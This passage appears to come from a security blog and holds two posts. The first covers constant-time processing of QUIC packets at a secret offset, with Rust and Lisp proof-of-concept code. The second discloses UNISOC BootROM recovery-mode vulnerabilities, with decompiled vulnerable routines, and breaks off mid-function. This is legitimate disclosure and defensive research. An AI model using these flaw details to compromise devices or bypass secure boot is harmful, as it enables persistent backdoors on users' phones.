NCC Group Cryptography Services team identified deviations from the two standards in all reviewed QUIC implementations, for instance where the processing of packet numbers and sizes conditionally branches based on their values, or where data lookup depends on packet number sizes, thus inducing side channels that may assist attackers in guessing these values. They don’t reveal cryptographic keys or passwords; at worst, they may reveal a packet number and/or size, (and incidentally, the size of the embedded encrypted TLS record payload, after the QUIC packet number field).

One of these uncovered side channel issues is more interesting than others, as it is about processing data after a secret offset in a given payload, such as a QUIC packet in our case. It appears to be a less common issue, and there is no known efficient way to address them in the general case. Note that in the aforementioned BearSSL article, CBC padding) verification is one instance of processing data at a secret offset, for which a specific, relatively efficient solution was identified, and implemented to remediate the TLS “Lucky Thirteen” attack (HTTP link).

Before we delve into constant-time processing of data at a secret offset, let’s quickly recall a few concepts:

  • A timing side channel is a vulnerability where an attacker may learn some or all information about the secret data being processed, because the execution trace varies with the secret value itself. A typical, and somehow more widely-know timing side channel issue materializes when a given user hashed password is compared against a server record of that hashed password in a web application. How long it takes to compare the hashed passwords may reveal that the first few bytes up to the length of the hashed passwords match or not. This may help an attacker guess the hashed password, and possibly the password if it is weak.
  • Constant-time processing of secret data aspires to not reveal that secret data, via timing side channels. In our web application example, this would mean that the comparison of the hashed passwords would not return until all bytes have been compared, whether some or all of the two hashed passwords bytes differ or not.

Processing Data in Constant-Time at a Secret Offset Applied to QUIC

So, what do we mean by constant-time processing of (potentially secret) data, at a secret offset? To illustrate the issue, we will look at the structure of a QUIC application packet, and how one would process it. It is composed of the following fields:

  • Packet Header Byte, fixed length, one byte, encrypted. The least significant two bits of the decrypted Packet Header Byte encode the secret packet number field size, in bytes: b00 = 1, b01 = 2, b10 = 3, or b11 = 4.
  • Destination Connection ID, zero to twenty bytes, in plaintext.
  • Packet Number, variable length of 1 to 4 bytes, encrypted.
  • Encrypted Application Traffic Data, variable length.
  • AEAD Authentication Tag, fixed length, in plaintext.

A naïve QUIC implementation may perform the following to retrieve the application data from this packet:

  1. Read one Packet Header Byte, at a fixed offset from the beginning of the packet.
  2. Decrypt the Packet Header Byte.
  3. Extract the length of the Packet Number field, from the decrypted Packet Header Byte.
  4. Read Destination Connection ID, at a fixed offset from the beginning of the packet.
  5. Read 1, 2, 3 or 4 bytes depending on the Packet Number field length, extracted from Packet Header Byte above, at a publicly known offset from beginning of packet.
  6. Read Encrypted Application Traffic Data, up to packet length minus AEAD Authentication Tag length, at a variable offset from beginning of packet.
  7. Read AEAD Authentication Tag, at a fixed offset from the end of packet.
  8. Decrypt Encrypted Application Traffic Data using AEAD Authentication Tag.
  9. Process decrypted application traffic.

Steps 5. and 6. are in effect look-ups indexed by secret data, the packet number length. The access time to an indexed element in memory can vary with its index, depending on whether a cache-miss has occurred or not. This may reveal the value of the packet number length, and incidentally, the size of the Encrypted Application Traffic Data.

Ensuring that code does not leak the size of the packet number can be implemented using constant-time selection of bytes for each possible offset over the whole QUIC packet, starting at the offset of the packet number size field.

Constant-Time Proof Of Concept Code

We will try to implement a prototype of constant-time processing at a secret offset in the Rust programming language, using a simplified problem. Our sample application processes packets consisting of the following fields:

  • Packet Header Byte . The least significant two bits of the decrypted Packet Header Byte encode the secret packet number field size, in bytes: b00 = 1, b01 = 2, b10 = 3, or b11 = 4. Assume it is in plaintext, e.g. decrypted earlier by our application for our purpose.
  • Packet Number variable length of 1 to 4 bytes. Encrypted, and the actual packet number value is not used in our example. The length of the field is secret, and must be determined in constant-time.
  • Data, variable length, padded to maximum packet size.

We arbitrarily choose a maximum packet size of 12 bytes in our example, so the Data payload may range from 7 to 10 bytes long. With the above, how do we extract and return Data without revealing Packet Number length?

We first need to implement three constant-time primitives. Function is_zero() takes a byte, using an unsigned 32 bits representation, and returns 2^32 – 1 if the byte is equal to 0, or 0 otherwise:

// return 2^32 -1 if x is 0, otherwise 0 in constant-time
// #[inline(always)]
pub fn is_zero(x: u32) -> u32 {
    !(((x as i32) | (x.wrapping_neg() as i32)) >> 31) as u32
}

If argument x to function is_zero() is set to 0, then both x and -x are equal to 0. The bitwise OR | and arithmetic right shift >> operators do not affect that result. If x is not equal to 0, at least x or -x will have the leftmost bit set, and the (signed) arithmetic right shift will fill the rest of the byte with 1s, forming the value 2^32 – 1. The negation, which inverts the result from 0 to 2^32 -1, and vice versa is not necessary – for the purpose of this post, it makes it easier to relate the code to boolean values true (2^32 -1) and false (0), and hopefully aid comprehension.

We model this algorithm using the Z3 Theorem Prover to validate its correctness, and elucidate potential incorrect assumptions or misunderstandings.

(push)
;; if x == 0 then our function will return 2^32 - 1
(assert
 (forall ((x  (_ BitVec 32)))
	 (=> (= x (_ bv0 32)) ; x == 0
	     (= (_ bv4294967295 32) ; result == 4294967295
		(bvnot
		 (bvashr ;;(signed) arithmetic shift 
			 (bvor x
			       (bvadd (_ bv1 32) (bvnot x))) ; modeling of two-complement negation of x
			 (_ bv31 32)))))))

(check-sat)

(pop)
(push)

;; if x > 0 then our function will return 0
(assert
 (forall ((x  (_ BitVec 32)))
	 (=> (bvugt x (_ bv0 32)) ; x > 0
	     (= (_ bv0 32) ; result == 0
		(bvnot
		 (bvashr
		  (bvor x (bvadd (_ bv1 32) (bvnot x)))
		  (_ bv31 32)) )))))

(check-sat)

(pop)
(push)

;; for all x, our function will return 0 or 2 ^ 32 - 1
(assert
 (forall ((x  (_ BitVec 32)))
	 (or (= (_ bv4294967295 32)
		(bvnot
		 (bvashr
		  (bvor x (bvadd (_ bv1 32) (bvnot x)))
		  (_ bv31 32)) ))
	     (= (_ bv0 32)
		(bvnot
		 (bvashr
		  (bvor x (bvadd (_ bv1 32) (bvnot x)))
		  (_ bv31 32)) )))))

(check-sat)

Z3 should return three consecutive (sat), showing that our assertions hold, and strengthening our confidence in our algorithm, assuming that we modeled the algorithm correctly, and that our Rust implementation implements the same algorithm as Z3. Of course, because our input is small (one byte), we can write a unit test case in our target implementation language, which verifies the results for all potential byte input values. Z3 can verify the results for much larger input e.g. 32 or 64 bits.

The second primitive, is_equal() compares two bytes, and returns 2^32 – 1 if they are equal, or 0 otherwise:

// return 2^32 -1  if x and y are equal, otherwise 0 in constant-time
// #[inline(always)]
pub fn is_equal(x: u32, y: u32) -> u32 {
    is_zero(x ^ y)
}

It builds upon our previous function is_zero() and uses the XOR operation, which returns 2^32 – 1 if both operands are equal. Then is_zero(0) is 2^32 -1, and is_zero(x>0) is 0. The last primitive conditional_select_ct() is a conditional selection between two values (without actual branching and therefore timing side channels), based on a given choice value, which in our case, can be either 0 or 2^32 – 1:

// return y if choice is zero, else x (choice i == 2^32 -1 ) in constant-time
// #[inline(always)]
pub fn conditional_select_ct(x: u32, y: u32, choice: u32) -> u32 {
    return y ^ (choice & (x ^ y));
}

If choice is 0, then the right expression (choice & (x ^ y)) returns (bitwise AND & between 0 and any other value always return 0), and conditional_select_ct() returns the value y XOR 0, therefore y.

if choice is 2^32 -1, bitwise AND works as an identity function (over the length of the 32 bits argument), and returns the right most expression (x ^ y). We are left with expression y ^ x ^ y , with both ys “canceling” each other (y ^ y == 0), ultimately evaluating to x ^ 0, therefore x.

Now, we can implement the main function that correctly returns the data at the secret index offset (either +1, +2, +3 or +4) in constant-time, using our last primitive:

// PACKET HEADER BYTE (1) | PACKET NUMBER (1..4) | DATA TO EXTRACT ...Zero padded (7-10) |
//                        ^                      ^
//                        |                      |-- Secret offset
//                        |-- Known offset

const PACKET_NUMBER_FIELD_START_OFFSET: usize = 1;
const PACKET_NUMBER_MIN_LEN : usize = 1;
const PACKET_NUMBER_MAX_LEN : usize = 4;
const DATA_FRAME_SIZE: usize = 12;

// Take a buffer of data of packet header,
// packet number (whose len is secret and ranges from 1 to 4),
// and of data to extract at secret offset
// and return extracted data in constant-time
// Returned data must be processed in constant-time
// otherwise it will reveal length of packet number
pub fn extract_data_at_secret_index (data: &[u8]) -> [u8; DATA_FRAME_SIZE] {
    assert!(data.len() == DATA_FRAME_SIZE);
    let mut data_out = [0u8; DATA_FRAME_SIZE];

    let secret_length = (data[0] & 0x03) + 1; // compute the length of secret data

    for offset in PACKET_NUMBER_MIN_LEN..=PACKET_NUMBER_MAX_LEN {
        let mut i = offset;
        while i < DATA_FRAME_SIZE - PACKET_NUMBER_FIELD_START_OFFSET {
            data_out[i-offset] =
            conditional_select_ct( data[i+PACKET_NUMBER_FIELD_START_OFFSET] as u32,
                data_out[i-offset] as u32,
                is_equal(offset as u32 , secret_length as u32)) as u8;
            i += 1;
        }
    }
    data_out

}

After we extracted our secret packet number field length, we loop over the packet 4 (offset possible range of values) times. In each loop, we compare the offset with our secret packet number length. If they match, we conditionally select and copy in constant-time the correct byte value from our input (for each byte of the input), otherwise we just copy the previous byte value again. This means that in 1 out of 4 loops, we copy the correct value from our input, and that in 3 out of 4 loops, we copy the previous value again (whether it was set to the correct value yet, or not).

Let’s write an unit test case, to demonstrate the input and expected output for a secret offset of value 2 (meaning that the packet number field size is 2 bytes). We expect our attacker to not learn anything about the size of the packet number field, during the processing of the data field. For the purpose of our test, we set the packet number value to an arbitrary value, 0xffff, which has no incidence on the objectives of our test:

    #[test]
    fn displacement_2() {
        let data = [ 0x01u8, 0xff, 0xff, 1, 2, 3, 4, 5, 6, 7, 0, 0 ];
        let result = [1u8, 2, 3, 4, 5, 6, 7, 0, 0, 0, 0, 0];
        let r = extract_data_at_secret_index(&data);
        assert_eq!(result, r);
    }

As we can see above, function extract_data_at_secret_index() stripped the `Packet Header Byte, of value 0x40 (0b01000000), the Packet Number of value 0xffff from the packet, and outputted the plaintext DATA (1,2,3,4,5,6,7), padded with extra 0s up to the length of the original packet.

Potential Shortcomings

For the implementation to be effectively constant-time, we have to have padded data. Otherwise, processing of the extracted data would reveal the size of the data after the secret offset, and therefore of the secret offset in the packet.

Furthermore, all additional processing of the extracted data must continue to be constant-time, as it may again reveal the size of the secret offset. This may be an insurmountable task, depending of the data to be processed. Areas of risk may include decryption, as in the case of the QUIC protocol, but also deserialization of data (e.g. JSON, base64), business logic etc.

Compilers, computer architectures, and operating environments also play a substantial role in enforcing constant-time execution. Compilers may or may not emit constant-time code with the same input, from one release to another. Several computer architectures may have non constant-time operations, such as multiplication, and binary right shift. Constant-time code implementers must carefully review the disassembled code output of their compilers in the context of the target operating environments, and actually time their code for increased assurance.

We analyzed the disassembly output for the Rust x86_64 compiler version 1.61.0 on macOS, and found it to be free of side-channels. For example, when is_zero is not compiled inline, it produces the following output, which does not contain any branching based on secret data:

objdump  -disassemble -x86-asm-syntax=intel target/release/libct_secret_pos.rlib

target/release/libct_secret_pos.rlib(lib.rmeta):	file format mach-o 64-bit x86-64


target/release/libct_secret_pos.rlib(ct_secret_pos-ffc0c1f54738cb18.ct_secret_pos.e06b5aa2-cgu.0.rcgu.o):	file format mach-o 64-bit x86-64


Disassembly of section __TEXT,__text:

0000000000000000 <__ZN13ct_secret_pos7is_zero17h31d480cf09b5c4d9E>:
       0: 55                           	push	rbp
       1: 48 89 e5                     	mov	rbp, rsp
       4: 83 ff 01                     	cmp	edi, 1
       7: 19 c0                        	sbb	eax, eax
       9: 5d                           	pop	rbp
       a: c3                           	ret
       b: 0f 1f 44 00 00               	nop	dword ptr [rax + rax]

Cost

We now hopefully have a constant-time implementation to extract data after a secret offset. However, the implementation is costly: we need to iterate 4 times over every received packet, from a publicly known offset near the beginning of the packet, up to its end, including padding. A QUIC packet can be up to 1,350 bytes long, minus 1 byte for the Packet Header Byte, and up to 20 bytes for the Destination Connection ID field. Things get worse thereafter. Remember that in QUIC, Encrypted Application Traffic Data is actually encrypted. We need to decrypt the data at 4 different offsets to not reveal its length, and the actual secret offset by inference, based on the maximum QUIC packet length. Then the application needs to decode, and process the decrypted data, in constant-time, depending of its threat mode, as alluded to earlier in this post.

We also casually omitted in our simplified QUIC protocol, that the value of the packet number is actually encrypted too, and must be decrypted, you guessed, four times, and processed in-constant-time thereafter.

Then there is the cost of the attack to consider. Most side-channel vulnerabilities are thought to be ranging from challenging to impossible to exploit, but this is highly contingent of the execution environment (attackers would fare a better chance if the QUIC process runs in the SGX Trusted Execution Environment, with the attackers controlling the SGX host), attacker location (host, local or publicly addressable network, etc.). It seems unlikely that attackers would expend effort in mounting an attack to reveal the packet number size, to further de-anonymize users, at least in the absence of other vulnerabilities, and in the vast majority of usage contexts.

Potential Improvements

In the general case, if one wants to access data at a secret offset and the secret offset range (maximum minus minimum) is N, then it can be done in log(N) passes.

In the case of QUIC and the packet number field, N = 4 so it hardly justifies doing anything more sophisticated, but it can be helpful in some situations. In the case of TLS 1.2 CBC records (the aforementioned TLS “Lucky Thirteen” attack remediation), the range is N = 20 (the size of a HMAC/SHA-1 output) and it can become interesting to use the log(N) optimization (the 20-byte value is “rotated back” in 5 passes instead of 20). See CBC padding.

Conclusion and Closing Thoughts

The QUIC protocol implements controls to ensure that packet numbers cannot be used to correlate users activity. Decoding, and processing of data based on the packet number field size may reveal information about the packet number, and facilitate correlation of users activity. In order to prevent this, the QUIC protocol mandates that decoding of packet numbers must be performed free of side channels. The QUIC packet number has a variable size encoding, forcing implementors to resort to constant-time processing at a secret offset, which is costly in the general case. We demonstrated a simplified example of such constant-time processing in the Rust programming language, noting that to maintain constant-time properties, one must establish an appropriate process as part of the software development life cycle to minimize risks over time.

Source Code and Extra Material

In this section, we provide the full Rust implementation of the constant-time proof of concept code, and an extra proof of concept implementation of constant-time data processing at a secret offset in the Common Lisp, a general-purpose, multi-paradigm programming language.

Constant-time data processing at a secret offset proof of concept code in Rust:


// return 2^32 -1 if x is 0, otherwise 0 in constant-time
// #[inline(always)]
pub fn is_zero(x: u32) -> u32 {
    !(((x as i32) | (x.wrapping_neg() as i32)) >> 31) as u32
}

// return 2^32 -1  if x and y are equal, otherwise 0 in constant-time
// #[inline(always)]
pub fn is_equal(x: u32, y: u32) -> u32 {
    is_zero(x ^ y)
}

// return y if choice is zero, else x (choice i == 2^32 -1 ) in constant-time
// #[inline(always)]
pub fn conditional_select_ct(x: u32, y: u32, choice: u32) -> u32 {
    return y ^ (choice & (x ^ y));
}

// PACKET HEADER BYTE (1) | PACKET NUMBER (1..4) | DATA TO EXTRACT ...Zero padded (7-10) |
//                        ^                      ^
//                        |                      |-- Secret offset
//                        |-- Known offset

const PACKET_NUMBER_FIELD_START_OFFSET: usize = 1;
const PACKET_NUMBER_MIN_LEN : usize = 1;
const PACKET_NUMBER_MAX_LEN : usize = 4;
const DATA_FRAME_SIZE: usize = 12;

// Take a buffer of data of packet header,
// packet number (whose len is secret and ranges from 1 to 4),
// and of data to extract at secret offset
// and return extracted data in constant-time
// Returned data must be processed in constant-time
// otherwise it will reveal length of packet number
pub fn extract_data_at_secret_index (data: &[u8]) -> [u8; DATA_FRAME_SIZE] {
    assert!(data.len() == DATA_FRAME_SIZE);
    let mut data_out = [0u8; DATA_FRAME_SIZE];

    let secret_length = (data[0] & 0x03) + 1; // compute the length of secret data

    for offset in PACKET_NUMBER_MIN_LEN..=PACKET_NUMBER_MAX_LEN {
        let mut i = offset;
        while i < DATA_FRAME_SIZE - PACKET_NUMBER_FIELD_START_OFFSET {
            data_out[i-offset] =
            conditional_select_ct( data[i+PACKET_NUMBER_FIELD_START_OFFSET] as u32,
                data_out[i-offset] as u32,
                is_equal(offset as u32 , secret_length as u32)) as u8;
            i += 1;
        }
    }
    data_out

}

#[cfg(test)]
mod tests {

    use crate::is_zero;
    use crate::is_equal;
    use crate::extract_data_at_secret_index;

    #[test]
    // We test for a byte range [0,255]
    fn it_is_correct_and_does_not_overflow() {
        for i in 1..=u32::MAX {
            assert_eq!(is_zero(i), 0);
        }
        assert_eq!(is_zero(0), u32::MAX);
    }

    #[test]
    fn ct_base_operations() {
        assert_eq!(is_zero(5), 0);
        assert_eq!(is_zero(255), 0);
        assert_eq!(is_zero(0), u32::MAX);
        assert_eq!(is_equal(0, 255), 0);
        assert_eq!(is_equal(255,255), u32::MAX);
        assert_eq!(is_equal(1,2), 0);
    }

    #[test]
    fn displacement_1() {
        let data = [ 0x00u8, 0xff, 1, 2, 3, 4, 5, 6, 7, 0, 0, 0 ];
        let result = [1u8, 2, 3, 4, 5, 6, 7, 0, 0, 0, 0, 0];
        let r = extract_data_at_secret_index(&data);
        assert_eq!(result, r);
    }

    #[test]
    fn displacement_2() {
        let data = [ 0x01u8, 0xff, 0xff, 1, 2, 3, 4, 5, 6, 7, 0, 0 ];
        let result = [1u8, 2, 3, 4, 5, 6, 7, 0, 0, 0, 0, 0];
        let r = extract_data_at_secret_index(&data);
        assert_eq!(result, r);
    }

    #[test]
    fn displacement_3() {
        let data = [ 0x02u8, 0xff, 0xff, 0xff, 1, 2, 3, 4, 5, 6, 7, 0 ];
        let result = [1u8, 2, 3, 4, 5, 6, 7, 0, 0, 0, 0, 0];
        let r = extract_data_at_secret_index(&data);
        assert_eq!(result, r);
    }

    #[test]
    fn displacement_4() {
        let data = [ 0x03u8, 0xff, 0xff, 0xff, 0xff, 1, 2, 3, 4, 5, 6, 7];
        let result = [1u8, 2, 3, 4, 5, 6, 7, 0, 0, 0, 0, 0];
        let r = extract_data_at_secret_index(&data);
        assert_eq!(result, r);
    }

}

Extra material: constant-time, allocation free data processing at a secret offset proof of concept code in Common Lisp.

(defconstant PACKET-NUMBER-FIELD-START-OFFSET 1)
(defconstant PACKET-NUMBER-MIN-LEN 1)
(defconstant PACKET-NUMBER-MAX-LEN 4)
(defconstant DATA-FRAME-SIZE 12)

(declaim (ftype (function ((unsigned-byte 32)) (unsigned-byte 32)) zero-p))
;;                          ^input             ^return value     ^function name
(declaim (inline zero-p))

(defun zero-p(x)
  (declare (optimize (speed 3) (safety 0)))
  (ldb (byte 32 0)
       (ash
	(lognor x (- x))
	-31)))

(declaim (ftype (function ((unsigned-byte 32) (unsigned-byte 32)) (unsigned-byte 32)) equal-p))
;;                          ^input 1          ^ input 2         ^return value      ^function name
(declaim (inline equal-p))

(defun equal-p( x y)
  (declare (optimize (speed 3) (safety 0)))
  (declare (inline equal-p))
  (zero-p (logxor x y)))

(declaim (ftype (function ((unsigned-byte 32) (unsigned-byte 32) (unsigned-byte 32))
			  (unsigned-byte 32)) conditional-select-ct))
(declaim (inline conditional-select-ct))

(defun conditional-select-ct (x y choice)
  (declare (optimize (speed 3) (safety 0)))
  (logxor y
	  (logand
	   choice
	   (logxor x y ))))

(declaim (ftype
          (function
           ((simple-array (unsigned-byte 8))
	    (simple-array (unsigned-byte 8))
	    (function))
           (simple-array (unsigned-byte 8)))
          decrypt-data-at-secret-index))

(defun decrypt-data-at-secret-index(data-in data-out decrypt-fn)
  (declare (optimize (speed 3) (safety 0)))
  (declare  (type (simple-array (unsigned-byte 8)) data-in data-out))
  (let ((secret-length (+ 1 (logand (aref data-in 0) #x03))))
    (declare (type (unsigned-byte 32) secret-length))
    (do ((offset PACKET-NUMBER-MIN-LEN (+ offset 1)))
	((> offset PACKET-NUMBER-MAX-LEN)
	 (funcall decrypt-fn data-out))
      (do* ((i offset ( + i 1))
	    (loc (-  i offset) (- i offset)))
	   ((= i (- DATA-FRAME-SIZE PACKET-NUMBER-FIELD-START-OFFSET)))
	(declare (type (unsigned-byte 32) offset i loc))
	(setf (aref data-out loc)
	      (conditional-select-ct
	       (aref data-in (+ i PACKET-NUMBER-FIELD-START-OFFSET))
	       (aref data-out loc)
	       (equal-p offset secret-length)))))))
;; dummy decrypt function

(declaim (ftype
          (function
           ((simple-array (unsigned-byte 8)))
           (simple-array (unsigned-byte 8)))
          echo))
(declaim (inline echo))

(defun echo(data)
  (declare (optimize (speed 3) (safety 0)))
  data)

;; test

(defun test-decrypt-data-at-secret-index ()
  (let ((test-data
	  (list
	   (make-array DATA-FRAME-SIZE
		       :element-type '(unsigned-byte 8)
		       :initial-contents '( #x00 #xff 1 2 3 4 5 6 7 0 0 0 ))
	   (make-array DATA-FRAME-SIZE
		       :element-type '(unsigned-byte 8)
		       :initial-contents '( #x01 #xff #xff 1 2 3 4 5 6 7 0 0))
	   (make-array DATA-FRAME-SIZE
		       :element-type '(unsigned-byte 8)
		       :initial-contents '( #x02 #xff #xff #xff 1 2 3 4 5 6 7 0))
	   (make-array DATA-FRAME-SIZE
		       :element-type '(unsigned-byte 8)
		       :initial-contents '( #x03 #xff #xff #xff #xff 1 2 3 4 5 6 7 ))))
	  (expected-result
	    (make-array DATA-FRAME-SIZE
			:element-type '(unsigned-byte 8)
			:initial-contents '(1 2 3 4 5 6 7 0 0 0 0 0))))
    (dolist (data-in test-data)
      (let ((data-out
	      (make-array DATA-FRAME-SIZE
			  :element-type '(unsigned-byte 8))))
	(assert
	 (equalp
	  (decrypt-data-at-secret-index data-in data-out #'echo) 
	  expected-result))))))

(test-decrypt-data-at-secret-index)

;; Uncomment the following to check assembly code

;; (compile 'decrypt-data-at-secret-index)
;; (compile 'conditional-select-ct)
;; (compile 'equal-p)
;; (compile 'zero-p)
;; (compile 'echo)
;; (disassemble 'decrypt-data-at-secret-index)
;; (disassemble 'conditional-select-ct)
;; (disassemble 'equal-p)
;; (disassemble 'zero-p)
;; (disassemble 'echo)

Example of assembly code output of functions zero-p, and decrypt-data-at-secret-index(), using Steel Bank Common Lisp (SBCL), a Common Lisp compiler on a macOS intel machine:

; disassembly for ZERO-P
; Size: 34 bytes. Origin: #x5361F5E6                          ; ZERO-P
; 5E6:       488BC2           MOV RAX, RDX
; 5E9:       48F7D8           NEG RAX
; 5EC:       4809C2           OR RDX, RAX
; 5EF:       48C1FA1F         SAR RDX, 31
; 5F3:       4883E2FE         AND RDX, -2
; 5F7:       4883F2FE         XOR RDX, -2
; 5FB:       482315C6FFFFFF   AND RDX, [RIP-58]               ; [#x5361F5C8] = #x1FFFFFFFE
; 602:       488BE5           MOV RSP, RBP
; 605:       F8               CLC
; 606:       5D               POP RBP
; 607:       C3               RET

; disassembly for CONDITIONAL-SELECT-CT
; Size: 18 bytes. Origin: #x5361FCA6                          ; CONDITIONAL-SELECT-CT
; A6:       4831FA           XOR RDX, RDI
; A9:       4821D6           AND RSI, RDX
; AC:       4831F7           XOR RDI, RSI
; AF:       488BD7           MOV RDX, RDI
; B2:       488BE5           MOV RSP, RBP
; B5:       F8               CLC
; B6:       5D               POP RBP
; B7:       C3               RET

Acknowledgments

Many thanks to my NCC Group colleagues Giacomo Pope (@isogenies) for his insightful feedback on this blog post, and Thomas Pornin (@bearsslnews), who taught me so much about timing side channels, for his comments.

Author: Gérald Doussot (@gerald_doussot)

There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities

2 September 2022 at 18:37

UNISOC (formerly Spreadtrum) is a rapidly growing semiconductor company that is nowadays focused on the Android entry-level smartphone market. While still a rare sight in the west, the company has nevertheless achieved impressive growth claiming 11% of the global smartphone application processor market, according to Counterpoint Research. Recently, it’s been making its way into some of the budget phones produced by name brands such as Samsung, Motorola and Nokia; and the newest 5G chipset advertises an impressive 6nm process.

Despite this rapid growth, little research has been published that validates the security of the overall UNISOC platform’s boot process; and so far prior research has been focused on the kernel drivers and the modem. With Google’s continued investments into the security of AOSP, these days often the weakest links in Android phones security are found in the semiconductor vendor or OEM additions. For example, pre-installed vendor applications, vendor kernel drivers, as well as the components of a custom secure boot chain are where many major vulnerabilities are being discovered.

Thus, for user privacy and security it is crucial that the foundation, such as bootloaders and vendor drivers, upon which Android builds up, are sufficiently secured.

As part of this research, NCC Group focused on the secure boot chain implemented by UNISOC processors used in Android phones and tablets. Several vulnerabilities in the Boot ROM were discovered which could persistently undermine secure boot. These vulnerabilities could be exploited by malicious software which previously escalated its privileges in order to insert a persistent undetectable backdoor into the boot chain, or by a local adversary with physical access to the device exploiting the recovery mode present on these devices.

Extracting the BootROM

The first step required prior to analyzing the BootROM is to extract its binary. While second-stage bootloaders are typically readily available from Android firmware update packages, and are commonly stored without any encryption, that is not the case for the BootROM code. Since it is baked into the processor’s silicon, there is little reason for a vendor to provide easily accessible and auditable firmware binaries, and perhaps there are incentives not to make it too easily accessible in the hopes of making potential vulnerabilities harder to discover. Regardless of the actual reason, this sort of secrecy leads to additional work on researchers’ behalf in order to initially gain access to the executable binary.

After setting our sights on several modern UNISOC chipsets, NCC Group has obtained multiple UNISOC SoC-based devices:

  • Teclast T40 Plus, based on the UNISOC Tiger T618 system-on-a-chip
  • Motorola Moto E40, based on the UNISOC Tiger T700 system-on-a-chip
  • Teclast T40 5G, based on the UNISOC Tangula T740 system-on-a-chip

Among these, the Teclast devices were previously documented to reuse the default UNISOC private key for signing its bootloaders that was freely available on GitHub. Additionally, as it turned out, the secure boot fuses were not burned on the Teclast devices and an arbitrary binary could be booted utilizing the system’s recovery protocol. Thus, the BootROM binary was dumped off these two devices with little effort, and was confirmed to be dated 2018-05-28 on the T618 and 2017-05-08 on the T740 device.

The Motorola device, on the other hand, did enable secure boot with a custom vendor key, so it was impossible to dump the BootROM utilizing the same shortcut. Instead, NCC Group had to reverse engineer FDL1, which is the second-stage recovery mode bootloader, and in the process discovered a buffer overflow vulnerability which allowed for arbitrary code to be executed and dumped the T700 BootROM through these means. As it turns out, however, the T700 BootROM is exactly the same as the T618 one, down to the date code marking present within the binary.

This vulnerability in FDL1 is described below.

Finding #1: Buffer Overflow in FDL1 USB Recovery Mode When Transferring Data (CVE-2022-38693)

  • NCC Group’s Overall Risk Assessment: High

FDL1 is a component of the UNISOC recovery process that is normally loaded from the host by the BootROM. FDL1 initializes system memory and loads the second-stage recovery payload, FDL2, from the host over a custom USB protocol. A buffer overflow issue exists in the function responsible for retrieving the data, reproduced in pseudocode below:

long usb_get_packet(byte *dst) {
  ...
  state = 0;
  is_masked = false;
  writeptr = dst;
  do {
    if (DAT_00014c40 == DAT_00014c10) {
      DAT_00014c40 = 0;
      DAT_00014c10 = 0;
      do {
        FUN_0000f460();
      } while (DAT_00014c10 == 0);
      DAT_00014c14 = DAT_00014c28;
      DAT_00014c28 = DAT_00014c28 ^ 1;
    }
    uVar2 = DAT_00014c10;
    pbVar3 = (byte *)(DAT_00014bc0 + (ulong)DAT_00014c40);
    while (DAT_00014c40 < uVar2) {
      DAT_00014c40 = DAT_00014c40 + 1;
      if (state == 1) {
LAB_0000fc70:
        bVar1 = *pbVar3;
        if (bVar1 != 0x7e) {
          if (bVar1 == 0x7d) {
            state = 2;
            is_masked = true;
          } else if (is_masked) {
            state = 2;
            *writeptr = bVar1 ^ 0x20;
            is_masked = false;
            writeptr = writeptr + 1;
          } else {
            *writeptr = bVar1;
            state = 2;
            writeptr = writeptr + 1;
          }
        }
      } else if (state == 0) {
        state = *pbVar3 == 0x7e;
      } else if (state == 2) {
        if (*pbVar3 == 0x7e) {
          return (long)writeptr - (long)dst;
        }
        goto LAB_0000fc70;
      }
      pbVar3 = pbVar3 + 1;
    }
  } while( true );
}

Note that the function does not enforce the maximum size of a payload that it can receive. As a result, a host can send a very large payload and cause a global buffer overflow, potentially resulting in arbitrary code being executed within FDL1.

In particular, NCC Group discovered that on a device based on the UNISOC T700 chipset, the temporary buffer is pointing into FDL1 executable memory. Therefore, exploiting this bug allows us to overwrite memory training code that is no longer needed after device initialization. If the overwrite is large enough, it is possible to overwrite the following executable code that is still being used, and execute arbitrary code within the context of FDL1.

NCC Group successfully exploited this vulnerability in order to obtain code execution within the FDL1 on the Moto E40 device and dump its BootROM.

Reverse Engineering the BootROM

Several common challenges arise when reverse-engineering a typical BootROM. Few, if any, debugging strings are available, and the code often makes use of undocumented hardware registers or various lower-speed peripheral interfaces. For example, instead of setting up a fast DMA transfer between eMMC flash and the main memory, code for which could typically be referenced in open-source Linux drivers, the BootROM may use a slower and simpler PIO interface, that may not be publicly documented or implemented. Nevertheless, by locating standard bootloader building blocks such as UART interfaces, USB setup packet parsing, and RSA signature validation it is possible to figure out the overall design and implementation of the BootROM.

In the case of UNISOC, the BootROM is a fairly simple binary blob that takes up just around 35 kilobytes of code. Two power-on boot modes are implemented: regular boot as well as recovery boot which is entered when either a specific key is held on power up, or the second-stage bootloader is missing or fails to validate. The recovery protocol itself is similar to what is present on the older UNISOC/Spreadtrum feature-phones, with the same algorithms used for CRC calculation and HDLC protocol wrapping.

Vulnerabilities in the Recovery Mode

Upon locating the code responsible for the implementation of the UNISOC BootROM recovery mode, NCC Group discovered that it lacked most of validity checks on the input data. Several vulnerabilities were quickly found that allowed for arbitrary code execution within the BootROM. All of these can be reachable by an attacker that has brief physical access to the device as booting a UNISOC phone or a tablet into recovery mode only requires holding a specific button (typically volume down) during power up. The vulnerabilities below are listed in the order of decreasing severity.

Finding #2: Unchecked Write Address (CVE-2022-38694)

  • NCC Group’s Overall Risk Assessment: High

The recovery mode implemented by UNISOC exposes 5 commands which are accessible over UART and USB interfaces with the goal of loading and starting the next-stage payload, FDL1.

The data transfer initialization command, cmd_start, was found not to perform any checks against the attacker-controlled target address of the payload:

void cmd_start(cmd_start_t *payload)
{
  uint write_addr_be;
  uint write_sz_be;

  write_addr_be = payload->addr_be;
  write_sz_be = payload->sz_be;
  // NCC: big endian byte-swap
  g_write_addr = (ulong)((write_addr_be ^ (write_addr_be >> 0x10 | write_addr_be << 0x10)) >> 8 &
                         0xff00ff ^ (write_addr_be >> 8 | write_addr_be << 0x18));
  g_write_sz = (ulong)((write_sz_be ^ (write_sz_be >> 0x10 | write_sz_be << 0x10)) >> 8 & 0xff00ff ^
                      (write_sz_be >> 8 | write_sz_be << 0x18));
  g_cur_write_ptr = g_write_addr;
  send_status(0x80);
  return;
}

Next, when the data transfer command, cmd_recv_data, is repeatedly executed, it writes attacker-controlled data to the attacker-controlled g_cur_write_ptr pointer and then advances it by the size of the data:

void cmd_recv_data(cmd_recv_data_t *payload)
{
  ulong sz;

  // NCC: big endian byte-swap
  sz = (ulong)((uint)((ulong)payload->size_be >> 8) | (payload->size_be & 0xff) << 8);
  memcpy2(g_cur_write_ptr,payload->data,sz);
